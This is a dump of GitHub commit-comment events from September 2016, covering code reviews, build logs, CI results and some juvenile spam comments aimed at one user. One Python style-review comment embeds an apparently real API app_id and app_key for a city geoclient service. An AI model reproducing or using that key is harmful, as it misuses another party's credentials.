{"id":"4552676734","type":"CommitCommentEvent","actor":{"login":"Gzopel"},"repo":{"name":"cwilgenhoff/rabbits3d-client"},"payload":{"comment":{"id":18994044,"position":null,"line":null,"path":null,"commit_id":"018580303d09d77c1a626a3d59e55cf074a4b854","created_at":"2016-09-13T00:08:43Z","updated_at":"2016-09-13T00:08:43Z","body":"were are you setting the default NODE_ENV value?"}},"created_at":"2016-09-13T00:08:43Z"}
{"id":"4552679418","type":"CommitCommentEvent","actor":{"login":"shinjonathan"},"repo":{"name":"shinjonathan/jesque"},"payload":{"comment":{"id":18994053,"position":23,"line":277,"path":"src/main/java/net/greghaines/jesque/client/AbstractClient.java","commit_id":"fb141c9499a8b2226dd79c6cc6ba5ad0ce75fdc7","created_at":"2016-09-13T00:09:32Z","updated_at":"2016-09-13T00:09:32Z","body":"a limitation of jedis.zadd(). This does not affect outcome though. If we want to maintain type on timeToRun, this would be another library we would have to customize"}},"created_at":"2016-09-13T00:09:32Z"}
{"id":"4552683866","type":"CommitCommentEvent","actor":{"login":"blakedy"},"repo":{"name":"shinjonathan/jesque"},"payload":{"comment":{"id":18994060,"position":22,"line":276,"path":"src/main/java/net/greghaines/jesque/client/AbstractClient.java","commit_id":"fb141c9499a8b2226dd79c6cc6ba5ad0ce75fdc7","created_at":"2016-09-13T00:10:48Z","updated_at":"2016-09-13T00:10:48Z","body":"compare https://github.com/resque/resque-scheduler/blob/master/lib/resque/scheduler/delaying_extensions.rb#L69\r\nto line 66"}},"created_at":"2016-09-13T00:10:48Z"}
{"id":"4552686085","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18994067,"position":null,"line":null,"path":null,"commit_id":"8937b558a7facd6c558772547cfb172a062e4057","created_at":"2016-09-13T00:11:30Z","updated_at":"2016-09-13T00:11:30Z","body":"Actually nevermind, i have an idea."}},"created_at":"2016-09-13T00:11:30Z"}
{"id":"4552687268","type":"CommitCommentEvent","actor":{"login":"behlendorf"},"repo":{"name":"dinatale2/zfs-buildbot"},"payload":{"comment":{"id":18994072,"position":14,"line":308,"path":"master/master.cfg","commit_id":"42ce0e0fb17a25002b6bd2dee07a1ab1c4311040","created_at":"2016-09-13T00:11:52Z","updated_at":"2016-09-13T00:11:52Z","body":"Actually.  It would be nice if we build these packages without debugging to get more realistic performance numbers.  We'll want to tweak the `bb-build-packages.sh` script to allow this, right now it always enabled debug.  One possible way to do this would be to set BB_MODE=\"PERF\" in ZFSEC2PerfTestSlave() instead of TEST.  Then key off this in `bb-build-packages.sh`."}},"created_at":"2016-09-13T00:11:52Z"}
{"id":"4552691492","type":"CommitCommentEvent","actor":{"login":"leocsq"},"repo":{"name":"leocsq/EC601csq1"},"payload":{"comment":{"id":18994085,"position":null,"line":null,"path":null,"commit_id":"f972002624e1e27468156125fe9fa4c1a15a81d7","created_at":"2016-09-13T00:13:10Z","updated_at":"2016-09-13T00:13:10Z","body":"hello github!"}},"created_at":"2016-09-13T00:13:10Z"}
{"id":"4552699965","type":"CommitCommentEvent","actor":{"login":"behlendorf"},"repo":{"name":"dinatale2/zfs-buildbot"},"payload":{"comment":{"id":18994097,"position":61,"line":355,"path":"master/master.cfg","commit_id":"42ce0e0fb17a25002b6bd2dee07a1ab1c4311040","created_at":"2016-09-13T00:15:40Z","updated_at":"2016-09-13T00:15:40Z","body":"To force the test suite to operate on real disks they need to be provided in the environment, otherwise it'll just create files in /var/tmp/ to use.  To do this we need to set `TEST_ZFSTESTS_DISKS=\"xvdb xvdc xvdd\"`, where the xvd* devices are the local instance storage we expect to exist in the AMI for this instance type.  (These are the devices we expect for an d2.xlarge instance)"}},"created_at":"2016-09-13T00:15:40Z"}
{"id":"4552702315","type":"CommitCommentEvent","actor":{"login":"caall99"},"repo":{"name":"jetty840/Sailfish-MightyBoardFirmware"},"payload":{"comment":{"id":18994100,"position":null,"line":null,"path":null,"commit_id":"7040951d3f217b0964bf3199a04568a0a7386aab","created_at":"2016-09-13T00:16:23Z","updated_at":"2016-09-13T00:16:23Z","body":"Updated and built avr-gcc 4.9.2. I was able to flash the built firmware, but my printer is showing a blank screen."}},"created_at":"2016-09-13T00:16:23Z"}
{"id":"4552704927","type":"CommitCommentEvent","actor":{"login":"behlendorf"},"repo":{"name":"dinatale2/zfs-buildbot"},"payload":{"comment":{"id":18994107,"position":63,"line":357,"path":"master/master.cfg","commit_id":"42ce0e0fb17a25002b6bd2dee07a1ab1c4311040","created_at":"2016-09-13T00:17:13Z","updated_at":"2016-09-13T00:17:13Z","body":"We may need to consider increasing `maxTime` depending on how we're able to tune the runtime of the performance tests.  Although I think 4 hours or less is roughly what we should shoot for."}},"created_at":"2016-09-13T00:17:13Z"}
{"id":"4552705447","type":"CommitCommentEvent","actor":{"login":"RJP43"},"repo":{"name":"ebeshero/DHClass-Hub"},"payload":{"comment":{"id":18994109,"position":null,"line":null,"path":null,"commit_id":"0ad33e48347d71b361f7517e87fed21a61abddf3","created_at":"2016-09-13T00:17:23Z","updated_at":"2016-09-13T00:17:23Z","body":"@asf46 and @etj27 Hey guys, notice in this commit I moved the Emily_Dickinson file (@asf46) and the Oi folder (@etj27) you each pushed to the class hub into our sandbox folder where we have designated space to experiment pushing such files/folders too. Make sure when you sync to the DHClass-Hub again that you **pull in these changes** I have made. Great job though getting files/folders into the Hub. Keep practicing :)"}},"created_at":"2016-09-13T00:17:23Z"}
{"id":"4552707725","type":"CommitCommentEvent","actor":{"login":"delete"},"repo":{"name":"delete/thanksforallthefish"},"payload":{"comment":{"id":18994117,"position":null,"line":null,"path":null,"commit_id":"3cd48ee92a895fe3b1953e7755ab8ec7a42a8bb3","created_at":"2016-09-13T00:18:06Z","updated_at":"2016-09-13T00:18:06Z","body":"Close issue #8 "}},"created_at":"2016-09-13T00:18:06Z"}
{"id":"4552714658","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":18994133,"position":16,"line":8315,"path":"sql/database.sql","commit_id":"3fc6f93583913d77fc096f6d7015b7bd8a142472","created_at":"2016-09-13T00:20:20Z","updated_at":"2016-09-13T00:20:20Z","body":"this line may cause a problem :)"}},"created_at":"2016-09-13T00:20:20Z"}
{"id":"4552716735","type":"CommitCommentEvent","actor":{"login":"sndnvaps"},"repo":{"name":"multirom-aries/android_device_xiaomi_aries"},"payload":{"comment":{"id":18994136,"position":null,"line":null,"path":null,"commit_id":"6ece8e7c198afe8df5fe402eff35e98109a94677","created_at":"2016-09-13T00:20:59Z","updated_at":"2016-09-13T00:20:59Z","body":"something is broken when built libaudiopllicymanager.so\r\n```bash\r\nhardware/qcom/audio-caf/msm8960/legacy/policy_hal/AudioPolicyManager.cpp:446:52: error: 'mSessions' is a private member of 'android::AudioInputDescriptor'\r\n                stopInput(activeInput, activeDesc->mSessions.itemAt(0));\r\n                                                   ^\r\nframeworks/av/services/audiopolicy/common/managerdefinitions/include/AudioInputDescriptor.h:78:35: note: declared private here\r\n    AudioSessionCollection        mSessions;\r\n                                  ^\r\nhardware/qcom/audio-caf/msm8960/legacy/policy_hal/AudioPolicyManager.cpp:446:62: error: no member named 'itemAt' in 'android::AudioSessionCollection'\r\n                stopInput(activeInput, activeDesc->mSessions.itemAt(0));\r\n                                       ~~~~~~~~~~~~~~~~~~~~~ ^\r\nhardware/qcom/audio-caf/msm8960/legacy/policy_hal/AudioPolicyManager.cpp:447:55: error: 'mSessions' is a private member of 'android::AudioInputDescriptor'\r\n                releaseInput(activeInput, activeDesc->mSessions.itemAt(0));\r\n                                                      ^\r\nframeworks/av/services/audiopolicy/common/managerdefinitions/include/AudioInputDescriptor.h:78:35: note: declared private here\r\n    AudioSessionCollection        mSessions;\r\n                                  ^\r\nhardware/qcom/audio-caf/msm8960/legacy/policy_hal/AudioPolicyManager.cpp:447:65: error: no member named 'itemAt' in 'android::AudioSessionCollection'\r\n                releaseInput(activeInput, activeDesc->mSessions.itemAt(0));\r\n                                          ~~~~~~~~~~~~~~~~~~~~~ ^\r\nhardware/qcom/audio-caf/msm8960/legacy/policy_hal/AudioPolicyManager.cpp:508:71: error: no member named 'itemAt' in 'android::AudioSessionCollection'\r\n                audio_session_t activeSession = activeDesc->mSessions.itemAt(0);\r\n                                                ~~~~~~~~~~~~~~~~~~~~~ ^\r\nhardware/qcom/audio-caf/msm8960/legacy/policy_hal/AudioPolicyManager.cpp:508:61: error: 'mSessions' is a private member of 'android::AudioInputDescriptor'\r\n                audio_session_t activeSession = activeDesc->mSessions.itemAt(0);\r\n                                                            ^\r\nframeworks/av/services/audiopolicy/common/managerdefinitions/include/AudioInputDescriptor.h:78:35: note: declared private here\r\n    AudioSessionCollection        mSessions;\r\n                                  ^\r\nhardware/qcom/audio-caf/msm8960/legacy/policy_hal/AudioPolicyManager.cpp:588:34: error: no member named 'mRegistrationId' in 'android::AudioMix'\r\n            address = policyMix->mRegistrationId;\r\n                      ~~~~~~~~~  ^\r\nhardware/qcom/audio-caf/msm8960/legacy/policy_hal/AudioPolicyManager.cpp:692:16: error: no member named 'mInputSource' in 'android::AudioInputDescriptor'\r\n    inputDesc->mInputSource = inputSource;\r\n    ~~~~~~~~~  ^\r\nhardware/qcom/audio-caf/msm8960/legacy/policy_hal/AudioPolicyManager.cpp:693:16: error: no member named 'mRefCount' in 'android::AudioInputDescriptor'\r\n    inputDesc->mRefCount = 0;\r\n    ~~~~~~~~~  ^\r\nhardware/qcom/audio-caf/msm8960/legacy/policy_hal/AudioPolicyManager.cpp:694:16: error: no member named 'mOpenRefCount' in 'android::AudioInputDescriptor'\r\n    inputDesc->mOpenRefCount = 1;\r\n    ~~~~~~~~~  ^\r\nhardware/qcom/audio-caf/msm8960/legacy/policy_hal/AudioPolicyManager.cpp:699:16: error: 'mSessions' is a private member of 'android::AudioInputDescriptor'\r\n    inputDesc->mSessions.add(session);\r\n               ^\r\nframeworks/av/services/audiopolicy/common/managerdefinitions/include/AudioInputDescriptor.h:78:35: note: declared private here\r\n    AudioSessionCollection        mSessions;\r\n                                  ^\r\nhardware/qcom/audio-caf/msm8960/legacy/policy_hal/AudioPolicyManager.cpp:699:37: error: too few arguments to function call, expected 2, have 1\r\n    inputDesc->mSessions.add(session);\r\n    ~~~~~~~~~~~~~~~~~~~~~~~~        ^\r\nsystem/core/include/utils/KeyedVector.h:85:13: note: 'add' declared here\r\n            ssize_t         add(const KEY& key, const VALUE& item);\r\n            ^\r\nhardware/qcom/audio-caf/msm8960/legacy/policy_hal/AudioPolicyManager.cpp:700:16: error: no member named 'mIsSoundTrigger' in 'android::AudioInputDescriptor'\r\n    inputDesc->mIsSoundTrigger = isSoundTrigger;\r\n    ~~~~~~~~~  ^\r\nhardware/qcom/audio-caf/msm8960/legacy/policy_hal/AudioPolicyManager.cpp:862:35: error: 'mSupportedDevices' is a private member of 'android::IOProfile'\r\n        if (activeDesc->mProfile->mSupportedDevices.types() & (newDevice & ~AUDIO_DEVICE_BIT_IN)) {\r\n                                  ^\r\nframeworks/av/services/audiopolicy/common/managerdefinitions/include/IOProfile.h:108:18: note: declared private here\r\n    DeviceVector mSupportedDevices; // supported devices: this input/output can be routed from/to\r\n                 ^\r\nhardware/qcom/audio-caf/msm8960/legacy/policy_hal/AudioPolicyManager.cpp:909:47: error: use of undeclared identifier 'mStreams'\r\n            voiceVolume = (float)index/(float)mStreams.valueFor(stream).getVolumeIndexMax();\r\n                                              ^\r\nhardware/qcom/audio-caf/msm8960/legacy/policy_hal/AudioPolicyManager.cpp:952:37: warning: data argument not used by format string [-Wformat-extra-args]\r\n            ALOGV(\"Input profile \", j);\r\n                  ~~~~~~~~~~~~~~~~  ^\r\nsystem/core/include/log/log.h:93:42: note: expanded from macro 'ALOGV'\r\n#define ALOGV(...) do { if (0) { __ALOGV(__VA_ARGS__); } } while (0)\r\n                                         ^~~~~~~~~~~\r\nsystem/core/include/log/log.h:91:56: note: expanded from macro '__ALOGV'\r\n#define __ALOGV(...) ((void)ALOG(LOG_VERBOSE, LOG_TAG, __VA_ARGS__))\r\n                                                       ^~~~~~~~~~~\r\nsystem/core/include/log/log.h:453:38: note: expanded from macro 'ALOG'\r\n    LOG_PRI(ANDROID_##priority, tag, __VA_ARGS__)\r\n                                     ^~~~~~~~~~~\r\nsystem/core/include/log/log.h:461:37: note: expanded from macro 'LOG_PRI'\r\n    android_printLog(priority, tag, __VA_ARGS__)\r\n                                    ^~~~~~~~~~~\r\nsystem/core/include/log/log.h:618:36: note: expanded from macro 'android_printLog'\r\n    __android_log_print(prio, tag, fmt)\r\n                                   ^~~\r\nhardware/qcom/audio-caf/msm8960/legacy/policy_hal/AudioPolicyManager.cpp:953:48: error: no member named 'mChannelMasks' in 'android::IOProfile'\r\n            for (size_t k = 0; k  < inProfile->mChannelMasks.size(); k++) {\r\n                                    ~~~~~~~~~  ^\r\nhardware/qcom/audio-caf/msm8960/legacy/policy_hal/AudioPolicyManager.cpp:955:32: error: no member named 'mChannelMasks' in 'android::IOProfile'\r\n                    inProfile->mChannelMasks.itemAt(k);\r\n                    ~~~~~~~~~  ^\r\nhardware/qcom/audio-caf/msm8960/legacy/policy_hal/AudioPolicyManager.cpp:957:32: error: no member named 'mChannelMasks' in 'android::IOProfile'\r\n                    inProfile->mChannelMasks.size());\r\n                    ~~~~~~~~~  ^\r\nsystem/core/include/log/log.h:93:42: note: expanded from macro 'ALOGV'\r\n#define ALOGV(...) do { if (0) { __ALOGV(__VA_ARGS__); } } while (0)\r\n                                         ^~~~~~~~~~~\r\nsystem/core/include/log/log.h:91:56: note: expanded from macro '__ALOGV'\r\n#define __ALOGV(...) ((void)ALOG(LOG_VERBOSE, LOG_TAG, __VA_ARGS__))\r\n                                                       ^~~~~~~~~~~\r\nsystem/core/include/log/log.h:453:38: note: expanded from macro 'ALOG'\r\n    LOG_PRI(ANDROID_##priority, tag, __VA_ARGS__)\r\n                                     ^~~~~~~~~~~\r\nsystem/core/include/log/log.h:461:37: note: expanded from macro 'LOG_PRI'\r\n    android_printLog(priority, tag, __VA_ARGS__)\r\n                                    ^~~~~~~~~~~\r\nsystem/core/include/log/log.h:618:36: note: expanded from macro 'android_printLog'\r\n    __android_log_print(prio, tag, fmt)\r\n                                   ^~~\r\nhardware/qcom/audio-caf/msm8960/legacy/policy_hal/AudioPolicyManager.cpp:963:36: error: no member named 'mChannelMasks' in 'android::IOProfile'\r\n                        inProfile->mChannelMasks.removeItemsAt(k, 1);\r\n                        ~~~~~~~~~  ^\r\nfatal error: too many errors emitted, stopping now [-ferror-limit=]\r\n1 warning and 20 errors generated.\r\nninja: build stopped: subcommand failed.\r\nmake: *** [ninja_wrapper] 错误 1\r\n```"}},"created_at":"2016-09-13T00:20:59Z"}
{"id":"4552718493","type":"CommitCommentEvent","actor":{"login":"kumpera"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":18994139,"position":40,"line":1915,"path":"builds/Makefile","commit_id":"7ee469b0ee02cf451a867ccc2b2c04bbece45b82","created_at":"2016-09-13T00:21:33Z","updated_at":"2016-09-13T00:21:33Z","body":"this is wrong, never use PWD in makefile as it breaks common usage."}},"created_at":"2016-09-13T00:21:33Z"}
{"id":"4552723130","type":"CommitCommentEvent","actor":{"login":"behlendorf"},"repo":{"name":"dinatale2/zfs-buildbot"},"payload":{"comment":{"id":18994151,"position":131,"line":868,"path":"master/master.cfg","commit_id":"42ce0e0fb17a25002b6bd2dee07a1ab1c4311040","created_at":"2016-09-13T00:23:01Z","updated_at":"2016-09-13T00:23:01Z","body":"We should probably convert this to lower case to maximize the change it matches the filter latter."}},"created_at":"2016-09-13T00:23:01Z"}
{"id":"4552725817","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18994157,"position":null,"line":null,"path":null,"commit_id":"10b33afeec108e778c0a97e16a544cfc5377d3be","created_at":"2016-09-13T00:23:56Z","updated_at":"2016-09-13T00:23:56Z","body":"buildingunit (nmerket) - x86_64-MacOS-10.10-clang: OK (2382 of 2451 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-10b33afeec108e778c0a97e16a544cfc5377d3be-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-10b33afeec108e778c0a97e16a544cfc5377d3be-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.18%25-yellow.svg)</a> \n"}},"created_at":"2016-09-13T00:23:56Z"}
{"id":"4552727723","type":"CommitCommentEvent","actor":{"login":"thebritican"},"repo":{"name":"thebritican/elm-calendar"},"payload":{"comment":{"id":18994166,"position":null,"line":null,"path":null,"commit_id":"6ffe37b1273da07f04788806366721e7e90d3b9c","created_at":"2016-09-13T00:24:32Z","updated_at":"2016-09-13T00:24:32Z","body":"@justinmimbs thanks for this! that's awesome. I'll change it tonight 😄 "}},"created_at":"2016-09-13T00:24:32Z"}
{"id":"4552728236","type":"CommitCommentEvent","actor":{"login":"trel"},"repo":{"name":"irods/irods_resource_plugin_s3"},"payload":{"comment":{"id":18994168,"position":null,"line":null,"path":null,"commit_id":"bafdf862ab6588e5fd806e148ecedd5c1195012a","created_at":"2016-09-13T00:24:41Z","updated_at":"2016-09-13T00:24:41Z","body":"addressed #1825"}},"created_at":"2016-09-13T00:24:41Z"}
{"id":"4552729272","type":"CommitCommentEvent","actor":{"login":"pauljoda"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":18994171,"position":null,"line":null,"path":null,"commit_id":"45097fed0c054407dedcf4cb9bab0e54b977d7e7","created_at":"2016-09-13T00:25:03Z","updated_at":"2016-09-13T00:25:03Z","body":"This is the one thing that needed to be added to make mods interact fully with capabilities. I like this idea. Will there be any more work done or is this meant to be light weight? Either way, this alone will make life compatibility much easier. "}},"created_at":"2016-09-13T00:25:03Z"}
{"id":"4552736135","type":"CommitCommentEvent","actor":{"login":"shamrock981"},"repo":{"name":"shamrock981/projectrishi"},"payload":{"comment":{"id":18994184,"position":12,"line":12,"path":"README.md","commit_id":"b252f6d67dfae2c1fc11dfb4281ab3c313792378","created_at":"2016-09-13T00:27:21Z","updated_at":"2016-09-13T00:27:21Z","body":"https://developers.google.com/maps/documentation/embed/guide "}},"created_at":"2016-09-13T00:27:21Z"}
{"id":"4552737280","type":"CommitCommentEvent","actor":{"login":"SiddharthLucky"},"repo":{"name":"SiddharthLucky/TestEngineDataNew"},"payload":{"comment":{"id":18994187,"position":null,"line":null,"path":null,"commit_id":"c18340abfb49f16fab6ff79ed71874f10272078d","created_at":"2016-09-13T00:27:43Z","updated_at":"2016-09-13T00:27:43Z","body":"Test"}},"created_at":"2016-09-13T00:27:43Z"}
{"id":"4552737734","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":18994189,"position":178,"line":3589,"path":"interface/forms/eye_mag/view.php","commit_id":"3fc6f93583913d77fc096f6d7015b7bd8a142472","created_at":"2016-09-13T00:27:53Z","updated_at":"2016-09-13T00:27:53Z","body":"Agree that can't use sql binding here. Can use the backup method of escaping for sql by wrapping each variable above with the following function:\r\n``````\r\n$SQL_INSERT .= \"('Eye_todo_done_\".add_escape_custom($providerID).\"','\".add_escape_custom($TODO['option_id'])...\r\n``````\r\nNote binding is better and you can not combine the two methods. But in this case add_escape_custom() will suffice."}},"created_at":"2016-09-13T00:27:53Z"}
{"id":"4552738508","type":"CommitCommentEvent","actor":{"login":"joshmaker"},"repo":{"name":"lucianreynolds/MBPO_GeoRef_XL_Service"},"payload":{"comment":{"id":18994198,"position":16,"line":10,"path":"GeoServiceMBPO.py","commit_id":"b0b41b609a7c28307214689dd7b88538f8982d94","created_at":"2016-09-13T00:28:09Z","updated_at":"2016-09-13T00:28:09Z","body":"It's generally recommended to try to and keep fewer than 100 characters on each line of code for better legibility. This can be difficult when you have long lines of text. One trick is that you can split text into multiple lines if you wrap it in parentheses. \r\n\r\nFor example:\r\n\r\n```python\r\n>>> a = 'Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua'\r\n>>> b = ('Lorem ipsum dolor sit amet, consectetur adipiscing elit, '\r\n         'sed do eiusmod tempor incididunt ut labore et dolore '\r\n         'magna aliqua')\r\n>>> a == b\r\nTrue\r\n```\r\n\r\nSo, for this example you could write it out as:\r\n\r\n```python\r\n    web_query = (\"https://api.cityofnewyork.us/geoclient/v1/\"\r\n                 \"address.json?houseNumber=\" + number + \r\n                 \"&street=\" + street + \r\n                 \"&borough=Manhattan&app_id=39eb3be5&app_key=mbpo19\")\r\n```\r\n\r\nAlso, nothing wrong with appending strings with the `+` operator, but for longer bits of text you might find the `format` method more more readable. For example:\r\n\r\n```python\r\n    web_query = (\"https://api.cityofnewyork.us/geoclient/v1/\"\r\n                 \"address.json?houseNumber={number}\" \r\n                 \"&street={street}\"\r\n                 \"&borough=Manhattan\"\r\n                 \"&app_id=39eb3be5\"\r\n                 \"&app_key=mbpo19\").format(number=number, street=street)\r\n```\r\n\r\nOne advantage to using the `format` method is that you can append non-string types, such as numbers, to strings.\r\n\r\n```python\r\n>>> 'Number of days: ' + 3\r\nTraceback (most recent call last):\r\n  File \"<stdin>\", line 1, in <module>\r\nTypeError: Can't convert 'int' object to str implicitly\r\n>>>\r\n>>> 'Number of days: {days}'.format(days=3)\r\nNumber of days: 3\r\n```\r\n\r\n"}},"created_at":"2016-09-13T00:28:09Z"}
{"id":"4552741229","type":"CommitCommentEvent","actor":{"login":"bgroenks96"},"repo":{"name":"forerunnergames/peril"},"payload":{"comment":{"id":18994200,"position":30,"line":59,"path":"core/src/main/java/com/forerunnergames/peril/core/model/battle/DefaultAttackOrder.java","commit_id":"59cb2e4e2fe58f0b1267e6b5f1a175e8871cf2b0","created_at":"2016-09-13T00:29:03Z","updated_at":"2016-09-13T00:29:03Z","body":"There are a rather insane number of arbitrary formatting changes to core code in this commit.... any chance you could tell IntelliJ to cool off a bit?"}},"created_at":"2016-09-13T00:29:03Z"}
{"id":"4552741771","type":"CommitCommentEvent","actor":{"login":"leonardofl"},"repo":{"name":"radar-parlamentar/radar"},"payload":{"comment":{"id":18994201,"position":6,"line":15,"path":"radar_parlamentar/plenaria/views.py","commit_id":"291e78e832f94119cfd0621a369f64960c24d4a0","created_at":"2016-09-13T00:29:14Z","updated_at":"2016-09-13T00:29:14Z","body":"Então... eu tinha deixado hard coded pra 1) evitar aparecer a conv e 2) não aparecer ainda a cdep, já q a plenária ainda não está preparada para a cdep.\r\nO 1 acho que eu até já tenha sido corrigido na raiz (script de importação), mas eu deixaria como tava até fazermos 2.\r\nOu acha q tudo bem deixar aberto pra galera ver o \"arco-íris\" da cdep (#377)?"}},"created_at":"2016-09-13T00:29:14Z"}
{"id":"4552741976","type":"CommitCommentEvent","actor":{"login":"thebritican"},"repo":{"name":"thebritican/elm-calendar"},"payload":{"comment":{"id":18994203,"position":null,"line":null,"path":null,"commit_id":"6ffe37b1273da07f04788806366721e7e90d3b9c","created_at":"2016-09-13T00:29:18Z","updated_at":"2016-09-13T00:29:18Z","body":"Also feel free to make a PR anytime! I'll definitely merge it"}},"created_at":"2016-09-13T00:29:18Z"}
{"id":"4552742774","type":"CommitCommentEvent","actor":{"login":"nicerobot"},"repo":{"name":"Spatially/sci-business-database"},"payload":{"comment":{"id":18994209,"position":1,"line":1,"path":"data/generated/tmp","commit_id":"0c7eb3583d95f3604de1480f59e9495a5f3717e5","created_at":"2016-09-13T00:29:37Z","updated_at":"2016-09-13T00:29:37Z","body":"Typically, just add a `.gitkeep` placeholder to hold an empty folder. Alternatively, just add a `.gitignore` file (though I think the intent of that becomes a little less obvious)"}},"created_at":"2016-09-13T00:29:37Z"}
{"id":"4552742849","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Stuff"},"payload":{"comment":{"id":18994210,"position":null,"line":null,"path":null,"commit_id":"7a44d96a0260d0b8ad238c9009aae460692dff36","created_at":"2016-09-13T00:29:39Z","updated_at":"2016-09-13T00:29:39Z","body":"@JoinRajuncraftNow YOU WILL RESPOND"}},"created_at":"2016-09-13T00:29:39Z"}
{"id":"4552744393","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Stuff"},"payload":{"comment":{"id":18994216,"position":null,"line":null,"path":null,"commit_id":"aead05b93d5e43141291067827f07e73a7eafc42","created_at":"2016-09-13T00:30:11Z","updated_at":"2016-09-13T00:30:11Z","body":"@JoinRajuncraftNow \r\nYou will tell me who you flirted with, even if it takes the ultimate email spam"}},"created_at":"2016-09-13T00:30:11Z"}
{"id":"4552745233","type":"CommitCommentEvent","actor":{"login":"bgroenks96"},"repo":{"name":"forerunnergames/peril"},"payload":{"comment":{"id":18994219,"position":23,"line":23,"path":"core/src/main/java/com/forerunnergames/peril/core/model/state/events/BattleResultContinueEvent.java","commit_id":"59cb2e4e2fe58f0b1267e6b5f1a175e8871cf2b0","created_at":"2016-09-13T00:30:25Z","updated_at":"2016-09-13T00:30:25Z","body":"What is this? This seems like a pretty big change to the attack phase logic...?"}},"created_at":"2016-09-13T00:30:25Z"}
{"id":"4552745569","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Stuff"},"payload":{"comment":{"id":18994221,"position":null,"line":null,"path":null,"commit_id":"e312c8d2c8f32e4e09c8a8ac58017b6ede95171e","created_at":"2016-09-13T00:30:32Z","updated_at":"2016-09-13T00:30:32Z","body":"@JoinRajuncraftNow\r\nTIME FOR SPAMMING"}},"created_at":"2016-09-13T00:30:32Z"}
{"id":"4552746090","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Stuff"},"payload":{"comment":{"id":18994225,"position":null,"line":null,"path":null,"commit_id":"e312c8d2c8f32e4e09c8a8ac58017b6ede95171e","created_at":"2016-09-13T00:30:44Z","updated_at":"2016-09-13T00:30:44Z","body":"EVERY SINGLE COMMIT"}},"created_at":"2016-09-13T00:30:44Z"}
{"id":"4552746548","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Stuff"},"payload":{"comment":{"id":18994226,"position":null,"line":null,"path":null,"commit_id":"4c6700980853aa40792b95612b6dbe186bc905da","created_at":"2016-09-13T00:30:53Z","updated_at":"2016-09-13T00:30:53Z","body":"@JoinRajuncraftNow SPAM"}},"created_at":"2016-09-13T00:30:53Z"}
{"id":"4552746797","type":"CommitCommentEvent","actor":{"login":"bgroenks96"},"repo":{"name":"forerunnergames/peril"},"payload":{"comment":{"id":18994227,"position":23,"line":23,"path":"core/src/main/java/com/forerunnergames/peril/core/model/state/events/BattleResultContinueEvent.java","commit_id":"59cb2e4e2fe58f0b1267e6b5f1a175e8871cf2b0","created_at":"2016-09-13T00:30:58Z","updated_at":"2016-09-13T00:30:58Z","body":"Or is it just a rename? I'm confused."}},"created_at":"2016-09-13T00:30:58Z"}
{"id":"4552747174","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Stuff"},"payload":{"comment":{"id":18994228,"position":null,"line":null,"path":null,"commit_id":"ccefb5077da5fea10d1a78c515693976633003dd","created_at":"2016-09-13T00:31:06Z","updated_at":"2016-09-13T00:31:06Z","body":"@JoinRajuncraftNow SPAM"}},"created_at":"2016-09-13T00:31:06Z"}
{"id":"4552747512","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Stuff"},"payload":{"comment":{"id":18994230,"position":null,"line":null,"path":null,"commit_id":"12aa94e5126f0c8fb04d56acd80b0de410aefac4","created_at":"2016-09-13T00:31:12Z","updated_at":"2016-09-13T00:31:12Z","body":"@JoinRajuncraftNow SPAM"}},"created_at":"2016-09-13T00:31:12Z"}
{"id":"4552748599","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18994232,"position":null,"line":null,"path":null,"commit_id":"40e2fb3ef0043224e1e0d4cad05e711a18f9c5d7","created_at":"2016-09-13T00:31:31Z","updated_at":"2016-09-13T00:31:31Z","body":"@JoinRajuncraftNow SPAM"}},"created_at":"2016-09-13T00:31:31Z"}
{"id":"4552748932","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18994233,"position":null,"line":null,"path":null,"commit_id":"999d1f4d1bc29fcd1d98b41d17c9cf2c843127b3","created_at":"2016-09-13T00:31:37Z","updated_at":"2016-09-13T00:31:37Z","body":"@JoinRajuncraftNow SPAM"}},"created_at":"2016-09-13T00:31:37Z"}
{"id":"4552749172","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18994235,"position":null,"line":null,"path":null,"commit_id":"dbfbddffa35785137a43111c476c58998fa3bc4a","created_at":"2016-09-13T00:31:41Z","updated_at":"2016-09-13T00:31:41Z","body":"@JoinRajuncraftNow SPAM"}},"created_at":"2016-09-13T00:31:41Z"}
